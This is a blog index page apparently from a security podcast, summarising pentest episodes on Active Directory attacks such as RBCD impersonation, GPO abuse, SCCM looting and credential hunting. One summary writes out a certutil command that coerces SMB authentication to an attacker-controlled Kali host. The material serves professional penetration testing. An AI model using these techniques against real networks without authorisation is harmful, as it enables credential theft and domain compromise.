Blog
Search all our posts or browse some of our most recent entries below:
7MS #640: Tales of Pentest Pwnage – Part 63
This was my favorite pentest tale of pwnage to date! There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here: Sprinkled farmer files around the environment Found high-priv boxes with WebClient enabled Added "ghost" machine to the Active Directory (we'll call it GHOSTY) RBCD attack to be able to impersonate a domain admin using the [...]
7MS #639: Tales of Pentest Pwnage – Part 62
Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket.
7MS #638: Tales of Pentest Pwnage – Part 61
Today we're talking pentesting - specifically some mini gems that can help you escalate local/domain/SQL privileges: Check the C: drive! If you get local admin and the system itself looks boring, check root of C - might have some interesting scripts or folders with tools that have creds in them. Also look at Look at Get-ScheduledTasks Find ids and passwords easily in Snaffler output [...]
7MS #637: BPATTY[RELOADED] Release Party
Hello friends, I'm excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks! - which stands for Brian's Pentesting and Technical Tips for You! It's a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP...what a concept!) covering my favorite bits on the site so far. Enjoy!
7MS #636: A Prelude to BPATTY(RELOADED)
Artificial hype alert! I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It's weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which [...]
7MS #635: Eating the Security Dog Food – Part 7
Today we're talking about eating the security dog food - specifically: Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)
7MS #634: Tales of Pentest Pwnage – Part 60
Hi, today's tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login
7MS #633: How to Create a Security Knowledgebase with Docusaurus
Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It's cool, it's free, it's from Meta and you can get up and going in just a few commands - check out their getting started guide to get rockin' in about 5 minutes. Important files include: [...]
7MS #632: Tales of Pentest Pwnage – Part 59
Today's tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task - like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If [...]
7MS #631: Tales of Pentest Pwnage – Part 58
Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme - fantastic resource for learning all about attacking SCCM - starting from a perspective of zero creds CMLoot - find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares [...]
7MS #630: Epic Road Trip Served with Security Sprinkles
Today I recap a two week personal/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don't care about their personal security Weakpass - a cool collection of word lists for brute-forcing and spraying that I'd never heard of Working on two security Webinars for Netwrix (here's part 1: Mastering Password Security & Active Directory Monitoring, [...]